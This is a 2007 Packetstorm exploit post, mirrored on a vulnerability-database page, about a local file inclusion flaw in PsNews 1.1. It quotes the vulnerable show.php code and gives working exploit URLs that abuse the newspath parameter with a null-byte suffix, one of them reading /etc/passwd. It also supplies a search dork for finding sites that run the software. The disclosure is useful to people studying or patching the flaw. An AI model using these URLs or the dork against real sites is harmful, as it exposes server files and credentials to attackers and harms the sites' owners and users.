Lucene search
K

psnews-lfi.txt

🗓️ 13 Jul 2007 00:00:00Reported by irk4zType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

PsNews 1.1 Local File Inclusion vulnerability, download at strefaphp.ne

Code
`# o [bug] /"*._ _ #  
# . . . .-*'` `*-.._.-'/ #  
# o o < * )) , ( #  
# . o `*-._`._(__.--*"`.\ #  
# #  
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion #  
# author: [email protected] #  
# download: #  
# http://www.strefaphp.net/index.php?page=download&what=download&fid=12 #  
# dork: "Powered by PsNews" ;] #  
  
/news/show.php:  
...  
if(eregi("://", $newspath)){  
die("Nieautoryzowany dostęp!");  
}  
if(!isset($newspath)){  
$newspath = "news";  
}  
include("$newspath/functions.php");  
...  
  
# exploit:  
  
http://[site]/[path]/news/show.php?newspath=/etc/passwd%00  
http://[site]/[path]/news/show.php?newspath=[file]%00  
  
  
# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
26